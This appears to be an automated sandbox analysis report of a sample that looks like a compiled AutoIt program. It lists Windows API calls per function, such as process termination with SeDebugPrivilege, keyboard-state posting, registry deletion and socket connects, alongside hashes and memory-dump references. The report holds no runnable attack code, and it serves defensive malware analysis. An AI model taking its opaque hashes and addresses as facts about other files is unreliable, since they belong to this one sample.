                                                                      • Opcode ID: 03b2aaa5875c38a20f6bc6ac9e0809af0cfb7643bd05d5f8a4adedd6c1cc388f
                                                                      • Instruction ID: 1afa2030a3ca59160e76295e712bc005b785d676de721596ef4c1aa55641a382
                                                                      • Opcode Fuzzy Hash: 03b2aaa5875c38a20f6bc6ac9e0809af0cfb7643bd05d5f8a4adedd6c1cc388f
                                                                      • Instruction Fuzzy Hash: 4F418175A00349AFEF219F64CC89BEA7BE8FF08350F11442AF554E7291D6719D889B60
                                                                      APIs
                                                                        • Part of subcall function 00573C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00573C7A
                                                                        • Part of subcall function 00573C55: Process32FirstW.KERNEL32(00000000,?), ref: 00573C88
                                                                        • Part of subcall function 00573C55: CloseHandle.KERNEL32(00000000), ref: 00573D52
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058E9A4
                                                                      • GetLastError.KERNEL32 ref: 0058E9B7
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0058E9E6
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0058EA63
                                                                      • GetLastError.KERNEL32(00000000), ref: 0058EA6E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0058EAA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: 256fb7752c3686a988a7537eb0b7ab097b0f485bc877b8931b5b890b6aa95c81
                                                                      • Instruction ID: 6c2be9874c79c7247c8a4bbb9c027b1e3c0cf7ac6ba0efcb6f78e3e48222114f
                                                                      • Opcode Fuzzy Hash: 256fb7752c3686a988a7537eb0b7ab097b0f485bc877b8931b5b890b6aa95c81
                                                                      • Instruction Fuzzy Hash: 3541C031200202AFDB14EF14DCAAFADBFA5BF91714F148819F9069B2D2CB74A845DB91
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00573033
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: 25e6d070ac787c9dcf49fce55305cc69740c24e9444f21c0a287e706f03e2208
                                                                      • Instruction ID: b51cefa5944b89e714a04fd193049634c148c0359639172383e5a7dc42fbfac0
                                                                      • Opcode Fuzzy Hash: 25e6d070ac787c9dcf49fce55305cc69740c24e9444f21c0a287e706f03e2208
                                                                      • Instruction Fuzzy Hash: 6511053124C746BEE7149A94EC4BDBB6F9CBF15330F20802EF908A6181EAB15F4076A0
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00574312
                                                                      • LoadStringW.USER32(00000000), ref: 00574319
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0057432F
                                                                      • LoadStringW.USER32(00000000), ref: 00574336
                                                                      • _wprintf.LIBCMT ref: 0057435C
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0057437A
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00574357
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 3648134473-3128320259
                                                                      • Opcode ID: 9fba5ea5341ecb6d661cad278451690e40dd106e0c0d13d25725243650f70043
                                                                      • Instruction ID: 09f6c8be622cce8c34bb5545e490eda70d049c54b3b1909ab45dbb7e0ef80afd
                                                                      • Opcode Fuzzy Hash: 9fba5ea5341ecb6d661cad278451690e40dd106e0c0d13d25725243650f70043
                                                                      • Instruction Fuzzy Hash: B80162F7900208BFE7119BA0DD89FF6776CEB08301F0005A6B749E6051EA745E899B71
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0059D47C
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0059D49C
                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0059D6D7
                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0059D6F5
                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0059D716
                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0059D735
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0059D75A
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0059D77D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: fe24b3e805c98c24677503dd7ae1e2e29986a83e16fc720233746bbe5d55ab5b
                                                                      • Instruction ID: 02c483bf65801246b2be36542057b3742a154a02b36ae691a1ca7d14e2e0a748
                                                                      • Opcode Fuzzy Hash: fe24b3e805c98c24677503dd7ae1e2e29986a83e16fc720233746bbe5d55ab5b
                                                                      • Instruction Fuzzy Hash: 8BB1897160022AEBDF14CFA8C9C5BBD7BB1FF44701F09806AED489B295D734A954DBA0
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C1C7,00000004,00000000,00000000,00000000), ref: 00512ACF
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0054C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00512B17
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0054C1C7,00000004,00000000,00000000,00000000), ref: 0054C21A
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0054C1C7,00000004,00000000,00000000,00000000), ref: 0054C286
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: 0d848419ad2869f368dbd36aedd1fa71f8810db5a8b32a1bfb25b979e72eb316
                                                                      • Instruction ID: 36556bd04a7dc42eed9accc0e2fc183e58935eab550fac518c59de2e931e45f6
                                                                      • Opcode Fuzzy Hash: 0d848419ad2869f368dbd36aedd1fa71f8810db5a8b32a1bfb25b979e72eb316
                                                                      • Instruction Fuzzy Hash: 21411B352097809AE7758B28CC8CBEB7F92BF95304F248C1AE04786560C6F1A8E5D720
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 005770DD
                                                                        • Part of subcall function 00530DB6: std::exception::exception.LIBCMT ref: 00530DEC
                                                                        • Part of subcall function 00530DB6: __CxxThrowException@8.LIBCMT ref: 00530E01
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00577114
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00577130
                                                                      • _memmove.LIBCMT ref: 0057717E
                                                                      • _memmove.LIBCMT ref: 0057719B
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 005771AA
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005771BF
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 005771DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 256516436-0
                                                                      • Opcode ID: e131dbb7d2d8c4a5c666629b15aec3c9f36293f7324014d3836f76c5f6ddc255
                                                                      • Instruction ID: 85646761ba12a105f6c1cfc56bd5ba619e00f0561bfc9deccc71eb96747f9c93
                                                                      • Opcode Fuzzy Hash: e131dbb7d2d8c4a5c666629b15aec3c9f36293f7324014d3836f76c5f6ddc255
                                                                      • Instruction Fuzzy Hash: 9F315375900205EBDF00EFA5DC89AAE7B78FF45710F1541A5E904DB256D7309E14EB60
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 005961EB
                                                                      • GetDC.USER32(00000000), ref: 005961F3
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005961FE
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0059620A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00596246
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00596257
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0059902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00596291
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005962B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 88a817af2554fad450a83ec9ab200cafed0fa067598ee80494670642140e6887
                                                                      • Instruction ID: 49804c434faf661e9704a74a8240c9b3a3eb655ab8ca01d3844d4ef5f5ef940d
                                                                      • Opcode Fuzzy Hash: 88a817af2554fad450a83ec9ab200cafed0fa067598ee80494670642140e6887
                                                                      • Instruction Fuzzy Hash: 4D317A76200210AFEF108F60DC8AFEA3FADEF5A765F050066FE08DA291C6759855DB60
                                                                      APIs
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                        • Part of subcall function 0052FC86: _wcscpy.LIBCMT ref: 0052FCA9
                                                                      • _wcstok.LIBCMT ref: 0057EC94
                                                                      • _wcscpy.LIBCMT ref: 0057ED23
                                                                      • _memset.LIBCMT ref: 0057ED56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Similarity
                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                      • String ID: X
                                                                      • API String ID: 774024439-3081909835
                                                                      • Opcode ID: 1f828cbfa49fc4645ae5fa569301911a401649551cd4e11ca1ebba286eca4cd7
                                                                      • Instruction ID: b9690470c2b9f21cc3e698e27f099dab6a6dba605b530fba3eaca57b339b1b00
                                                                      • Instruction Fuzzy Hash: B2C162715087029FD714EF24D85AE9ABFE4BF89310F00896DF899972A2DB30ED45DB42
                                                                      APIs
                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00586C00
                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00586C21
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00586C34
                                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00586CEA
                                                                      • inet_ntoa.WSOCK32(?), ref: 00586CA7
                                                                        • Part of subcall function 0056A7E9: _strlen.LIBCMT ref: 0056A7F3
                                                                        • Part of subcall function 0056A7E9: _memmove.LIBCMT ref: 0056A815
                                                                      • _strlen.LIBCMT ref: 00586D44
                                                                      • _memmove.LIBCMT ref: 00586DAD
                                                                      Similarity
                                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 3619996494-0
                                                                      • Opcode ID: 6d22e5aa4e9d5dfc129e60976b7ebe447526ac5a1d3adb22a1b7c095274bf5d9
                                                                      • Instruction ID: 2843c5bf708e6e018d7640e463c540f40357faef12047a10fbc748d17b196f0a
                                                                      • Instruction Fuzzy Hash: 4381E271208301ABD710FB24CC9AEAABBA8FFD4714F14491CF955AB292DB70ED44CB52
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0aee55a39749a88aefc236f8b3141ad982a594c4f25dc021980123317db58bda
                                                                      • Instruction ID: 489b3cab3d0cda6bfbe42f86cebab64605fba23926d28395e10844ebc5d2374a
                                                                      • Instruction Fuzzy Hash: 74716D34900509EFEF048F58CC48AFEBF79FF85314F148199FA15AA251C774AA91CBA8
                                                                      APIs
                                                                      • IsWindow.USER32(01004C58), ref: 0059B3EB
                                                                      • IsWindowEnabled.USER32(01004C58), ref: 0059B3F7
                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0059B4DB
                                                                      • SendMessageW.USER32(01004C58,000000B0,?,?), ref: 0059B512
                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0059B54F
                                                                      • GetWindowLongW.USER32(01004C58,000000EC), ref: 0059B571
                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0059B589
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                      • String ID:
                                                                      • API String ID: 4072528602-0
                                                                      • Opcode ID: e58d90cba0c9ca9c73c817970f3bb46133049a66d5c1e8c0cab8a5d3d44b65bc
                                                                      • Instruction ID: ba1d752fb73d8628ea64a57f6d3c7d51a11827d11506ccf0b23cd5d3cd0335d1
                                                                      • Instruction Fuzzy Hash: 7A719E34601204EFFF209F64E994FBA7FBAFF49300F14455AE949972A2D732A850EB50
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0058F448
                                                                      • _memset.LIBCMT ref: 0058F511
                                                                      • ShellExecuteExW.SHELL32(?), ref: 0058F556
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                        • Part of subcall function 0052FC86: _wcscpy.LIBCMT ref: 0052FCA9
                                                                      • GetProcessId.KERNEL32(00000000), ref: 0058F5CD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0058F5FC
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                      • String ID: @
                                                                      • API String ID: 3522835683-2766056989
                                                                      • Opcode ID: 89faada5edea683f0f3cd3994632530d2e5dfff8ceb2e3369d28b20642b45280
                                                                      • Instruction ID: 8d4413ea0493e55b199410cc9cc7aefc18a049f50971377fc97074a7c02285c9
                                                                      • Instruction Fuzzy Hash: E6619C75A0061A9FCF14EFA4C4959AEBBF5FF89310F148469E855BB351CB30AE41CB90
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00570F8C
                                                                      • GetKeyboardState.USER32(?), ref: 00570FA1
                                                                      • SetKeyboardState.USER32(?), ref: 00571002
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00571030
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0057104F
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00571095
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005710B8
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 93808dcfc9eff94ada3c5ed34282bb143451d16fd145cc3f6cb2f8944c344166
                                                                      • Instruction ID: edf702374f2cde1e95a6cb66f3c288652c53d3a2f6ce7038a242e8b244c91ff8
                                                                      • Instruction Fuzzy Hash: 4351E3A0504BD57EFB3646389C09BB6BEE97B06304F08C589E1DD898C3C2A89CD8F755
                                                                      APIs
                                                                      • GetParent.USER32(00000000), ref: 00570DA5
                                                                      • GetKeyboardState.USER32(?), ref: 00570DBA
                                                                      • SetKeyboardState.USER32(?), ref: 00570E1B
                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00570E47
                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00570E64
                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00570EA8
                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00570EC9
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 988af3b1ad3272b7a76f778e587493a6842b923825f604c82ac1287ec7a4a3d1
                                                                      • Instruction ID: cb34035ce88368859611c0e3b7c78ee087428b4bac2a22e9f3f9b2cc8cbd0505
                                                                      • Instruction Fuzzy Hash: 2551F3A05047D5BDFB3287249C45B7ABFE9BB06300F08D889E5DC868C2C395AC98F750
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _wcsncpy$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 2945705084-0
                                                                      • Opcode ID: e2c8613f45772d5159da3fba3af1b50219726d55d73bd739f61e42afbfb5254e
                                                                      • Instruction ID: 5db67f032f58edea3aa20c6aa47bf0734fca5f409eaf51b3c8b9d131691e1996
                                                                      • Instruction Fuzzy Hash: 9E41B375D1061576CB11EBB49C8A9CFBBB8BF44310F508966E508E3221FB34E255C7AA
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0056D5D4
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0056D60A
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0056D61B
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0056D69D
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: ,,Z$DllGetClassObject
                                                                      • API String ID: 753597075-3561685201
                                                                      • Opcode ID: 559929aaab7e6fd3baeab0a47f6bc32f6b27c159bba922ecf6014aa207671343
                                                                      • Instruction ID: e4e4d46c60179a1d16976dfe8a3a5a2bcec860fe26f8e8d4e59d1b20e3f7a163
                                                                      • Instruction Fuzzy Hash: 80418DB1A00205EFDB05CF64C884A9ABFB9FF58310F1589A9EC099F205DBB1D944DBB0
                                                                      APIs
                                                                        • Part of subcall function 0057466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00573697,?), ref: 0057468B
                                                                        • Part of subcall function 0057466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00573697,?), ref: 005746A4
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 005736B7
                                                                      • _wcscmp.LIBCMT ref: 005736D3
                                                                      • MoveFileW.KERNEL32(?,?), ref: 005736EB
                                                                      • _wcscat.LIBCMT ref: 00573733
                                                                      • SHFileOperationW.SHELL32(?), ref: 0057379F
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 1377345388-1173974218
                                                                      • Opcode ID: 5ca329353fffafd88e27670b943834cfccc167de119377b671a166eaec4cf803
                                                                      • Instruction ID: 7f884fd662ad88a83530aca6aa54872e45acf1d069f2c2b0ac503eb7455e26fd
                                                                      • Instruction Fuzzy Hash: 1D418FB1108346AEC755EF64E4459DFBBE8FF88390F00482EB489C3251EB34D689EB52
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 005972AA
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00597351
                                                                      • IsMenu.USER32(?), ref: 00597369
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005973B1
                                                                      • DrawMenuBar.USER32 ref: 005973C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                                      • String ID: 0
                                                                      • API String ID: 3866635326-4108050209
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00590FD4
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00590FFE
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 005910B5
                                                                        • Part of subcall function 00590FA5: RegCloseKey.ADVAPI32(?), ref: 0059101B
                                                                        • Part of subcall function 00590FA5: FreeLibrary.KERNEL32(?), ref: 0059106D
                                                                        • Part of subcall function 00590FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00591090
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00591058
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005962EC
                                                                      • GetWindowLongW.USER32(01004C58,000000F0), ref: 0059631F
                                                                      • GetWindowLongW.USER32(01004C58,000000F0), ref: 00596354
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00596386
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 005963B0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 005963C1
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 005963DB
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056DB2E
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056DB54
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0056DB57
                                                                      • SysAllocString.OLEAUT32(?), ref: 0056DB75
                                                                      • SysFreeString.OLEAUT32(?), ref: 0056DB7E
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0056DBA3
                                                                      • SysAllocString.OLEAUT32(?), ref: 0056DBB1
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      APIs
                                                                        • Part of subcall function 00587D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00587DB6
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005861C6
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005861D5
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0058620E
                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00586217
                                                                      • WSAGetLastError.WSOCK32 ref: 00586221
                                                                      • closesocket.WSOCK32(00000000), ref: 0058624A
                                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00586263
                                                                      Similarity
                                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 910771015-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 1038674560-2734436370
                                                                      APIs
